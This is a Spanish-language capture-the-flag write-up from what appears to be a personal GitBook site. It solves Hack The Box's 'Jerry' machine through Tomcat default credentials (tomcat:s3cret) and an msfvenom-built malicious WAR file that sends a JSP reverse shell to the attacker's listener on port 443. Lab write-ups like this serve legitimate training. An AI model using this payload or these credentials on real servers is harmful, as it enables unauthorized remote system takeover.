d4redevil
  • whoami
  • Active Directory
    • Enumeración
    • PowerShell para gestionar Active Directory
    • PowerView & SharpView
    • Ataques a Kerberos
    • Ataque de contraseñas
    • SMB Relay
    • Token Impersonation
    • Golden Ticket
    • LLMNR Poisoning
    • Mimikatz
    • Grupos privilegiados
    • LAPS
  • Linux
    • Enumeración
    • Escalación de privilegios
    • Transferencia de Archivos
  • Windows
    • Enumeración
    • Escalación de privilegios
      • SeImporsonate
      • SeDebugPrivilege
      • SeTakeOwnershipPrivilege
      • Backup Operators
      • DnsAdmins
    • Transferencia de Archivos
  • Scripting
    • Powershell
      • Introducción
      • Cmdlet
      • Alias
      • Comentarios
      • Comandos utiles
      • Variables
      • Tuberías (Pipes)
      • Operaciones
      • Estructuras Condicionales
  • OWASP TOP 10 y Vulnerabilidades Web
    • Inyecciones SQL
      • ¿Qué son las Inyecciones SQL?
      • Laboratorio
      • Inyecciones SQL basada en Uniones
      • Inyecciones SQL basadas en booleanos
      • Inyecciones SQL basadas en tiempo
  • Writeups
    • Hack The Box
      • Linux
        • 🟢Easy
        • 🟡Medium
          • Zipping
        • 🔴Hard
        • ⚫Insane
      • Windows
        • 🟢Easy
          • Devel
          • Grandpa
          • Granny
          • Jerry
          • Optimum
          • Legacy
          • Active
          • Sauna
        • 🟡Medium
        • 🔴Hard
        • ⚫Insane
    • The Hackers Labs
      • Linux
        • 🟢Principiante
          • Papaya
          • Can You Hack Me?
        • 🟡Avanzado
          • Runners
          • El Candidato
          • El Cliente
        • 🔴Profesional
        • ⚫Experto
          • ⚫Thlcppt_v16
      • Windows
        • 🟢Principiante
          • Cocido Andaluz
          • Ensalá Papas
        • 🟡Avanzado
        • 🔴Profesional
          • BlackGold
        • ⚫Experto
    • Dockerlabs
      • 🔵Muy fácil
      • 🟡Fácil
      • 🟠Medio
        • Database
      • 🔴Difícil
    • VulnHub
      • Linux
        • 🟢Easy
        • 🟡Medium
        • 🔴Hard
      • Windows
        • 🟢Easy
        • 🟡Medium
        • 🔴Hard
    • HackMyVM
      • Linux
        • 🟢Easy
        • 🟡Medium
        • 🔴Hard
        • ⚫Insane
      • Windows
        • 🟢Easy
        • 🟡Medium
        • 🔴Hard
        • ⚫Insane
  • Servicios Comunes
    • TCP
    • UDP
    • FTP (21)
    • SMB (445)
    • MySQL (3306)
    • MSSQL (1433)
  • Cheatsheet
    • Reconocimiento
    • Enumeración
    • Enumeración Web
    • Enumeración de CMS
    • Fuerza Bruta
    • Pivoting
    • Msfvenom
    • Utilidades
    • Fuerza bruta
    • Transferencia de Archivos
  • Contenedores
    • Docker
Con tecnología de GitBook
En esta página
  • Reconocimiento
  • Enumeración
  • Descubrimiento de puertos abiertos
  • Enumeración de versión y servicio
  • Explotación
  • Explotación
  1. Writeups
  2. Hack The Box
  3. Windows
  4. Easy

Jerry

AnteriorGrannySiguienteOptimum

Última actualización hace 11 meses

En este artículo, vamos a estar resolviendo la máquina Jerry de la plataforma Hack The Box. Para ganar acceso al sistema, nos valdremos de una fuga de información (Information Leakage), donde se utilizan credenciales por defecto para acceder al panel administrador de aplicaciones de Tomcat. Finalmente, para ganar acceso al sistema, desplegaremos un archivo malicioso .war el cual nos enviará una reverse shell a nuestro equipo, ganando acceso al sistema como el usuario NT\Authority System.

Reconocimiento

Lanzamos una traza ICMP a la máquina víctima para comprobar que tengamos conectividad.

Vemos que responde al envío de nuestro paquete, verificando de esta manera que tenemos conectividad. Por otra parte, confirmamos que estamos frente a una máquina Windows basandonos en el TTL (Time To Live) 127.

Enumeración

Descubrimiento de puertos abiertos

Realizamos un escaneo con nmap para descubrir que puertos TCP se encuentran abiertos en la máquina víctima.

nmap -sS -p- --open --min-rate 5000 10.10.10.95 -n -Pn -oG scanPorts -vvv

Enumeración de versión y servicio

Lanzamos una serie de script básicos de enumeración propios de nmap, para conocer la versión y servicio que esta corriendo bajo los puertos abiertos.

nmap -sCV -p80 10.10.10.15 -oN targeted -vvv

Explotación

Antes de ingresar al sitio web, utilizamos la herramienta wathweb para conocer un poco las tecnologías en el stio.

Como podemos observar, se esta ejecutando un servidor Apache Tomact/7.0.88.

Si ingresamos al sitio web, podemos confirmar que se trata de una instancia del servidor web Apache Tomcat.

Ingresamos contraseñas por defecto admin:admin y nada.

Pero si probamos con tomcat:s3cret (credenciales que aparecen en el ejemplo) tenemos acceso.

Explotación

Ahora que tenemos capacidad para desplegar una aplicación en Tomcat, lo que haremos es crear un archivo .war malicioso el cual nos ejecute una reverse shell a nuestro equipo.

Creamos el archivo .war con la herramienta msfvenom:

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.10 LPORT=443 -f war > shell.war

Subimos el .war desde el panel de Tomcat

Nos ponemos en escucha con netcat por el puerto 443

rlwrap nc -lnvp 443

Accedemos a la ruta donde esta desplegada la aplicación

Ganamos acceo al sistema como el usuario NT\Authority System

Por ultimo, leemos los flags de user.txt y root.txt.

De esta forma, concluimos la resolución de una nueva máquina.

Espero que hayas disfrutado del contenido, y que los conceptos hayan quedado claros. En caso de tener alguna duda, te invito a realizar nuevamente la máquina para afianzar tus conocimientos.

¡Gracias por leer!

Happy Hacking!

Accedemos a y nos solicita credenciales.

🟢
http://10.10.10.95:8080/manager/html
Reconocimiento usando el comando ping
Descubrimiento de puertos abiertos
Descubrimiento de versión y servicio con nmap
wathweb
Apache Tomcat/7.0.88
Listado de aplicaciones
NT\Authority System
Flags